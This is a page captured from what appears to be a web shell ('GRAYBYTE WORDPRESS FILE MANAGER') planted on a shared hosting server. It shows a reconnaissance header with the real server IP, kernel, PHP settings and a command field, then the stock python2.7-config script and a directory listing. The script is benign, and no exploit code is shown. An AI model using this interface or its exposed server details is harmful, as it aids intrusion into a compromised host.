GRAYBYTE WORDPRESS FILE MANAGER9065

Server IP : 68.65.123.43 / Your IP : 216.73.216.162
System : Linux server266.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
PHP Version : 8.0.30
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /opt/alt/python27/bin/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /opt/alt/python27/bin//python2.7-config
#!/opt/alt/python27/bin/python2.7

import sys
import os
import getopt
from distutils import sysconfig

valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
              'ldflags', 'extension-suffix', 'help']

def exit_with_usage(code=1):
    print >>sys.stderr, "Usage: %s [%s]" % (sys.argv[0],
                                            '|'.join('--'+opt for opt in valid_opts))
    sys.exit(code)

try:
    opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
    exit_with_usage()

if not opts:
    exit_with_usage()

pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var

opt_flags = [flag for (flag, val) in opts]

if '--help' in opt_flags:
    exit_with_usage(code=0)

for opt in opt_flags:
    if opt == '--prefix':
        print sysconfig.PREFIX

    elif opt == '--exec-prefix':
        print sysconfig.EXEC_PREFIX

    elif opt in ('--includes', '--cflags'):
        flags = ['-I' + sysconfig.get_python_inc(),
                 '-I' + sysconfig.get_python_inc(plat_specific=True)]
        if opt == '--cflags':
            flags.extend(getvar('CFLAGS').split())
        print ' '.join(flags)

    elif opt in ('--libs', '--ldflags'):
        libs = ['-lpython' + pyver + (sys.pydebug and "_d" or "")]
        libs += getvar('LIBS').split()
        libs += getvar('SYSLIBS').split()
        # add the prefix/lib/pythonX.Y/config dir, but only if there is no
        # shared library in prefix/lib/.
        if opt == '--ldflags':
            if not getvar('Py_ENABLE_SHARED'):
                libs.insert(0, '-L' + getvar('LIBPL'))
            if not getvar('PYTHONFRAMEWORK'):
                libs.extend(getvar('LINKFORSHARED').split())
        print ' '.join(libs)

    elif opt == '--extension-suffix':
        print (sys.pydebug and "_d" or "") + sysconfig.get_config_var('SO')

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
March 03 2024 22:48:59
root / root
0755
easy_install
0.236 KB
November 13 2023 21:14:06
root / linksafe
0755
easy_install-2.7
0.236 KB
November 13 2023 21:14:06
root / linksafe
0755
lswsgi
110.789 KB
February 24 2021 15:26:51
root / linksafe
0755
pip
0.645 KB
November 13 2023 21:11:12
root / linksafe
0755
pip-2
0.645 KB
November 13 2023 21:11:12
root / linksafe
0755
pip-2.7
0.645 KB
November 13 2023 21:11:12
root / linksafe
0755
pip2
0.645 KB
November 13 2023 21:11:12
root / linksafe
0755
pip2.7
0.645 KB
November 13 2023 21:11:12
root / linksafe
0755
pydoc
0.089 KB
January 08 2025 10:42:50
root / linksafe
0755
python
7.75 KB
January 08 2025 10:44:15
root / linksafe
0755
python-config
1.815 KB
January 08 2025 10:42:50
root / linksafe
0755
python2
7.75 KB
January 08 2025 10:44:15
root / linksafe
0755
python2-config
1.815 KB
January 08 2025 10:42:50
root / linksafe
0755
python2.7
7.75 KB
January 08 2025 10:44:15
root / linksafe
0755
python2.7-config
1.815 KB
January 08 2025 10:42:50
root / linksafe
0755
raven
0.297 KB
October 18 2019 13:53:42
root / linksafe
0755

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF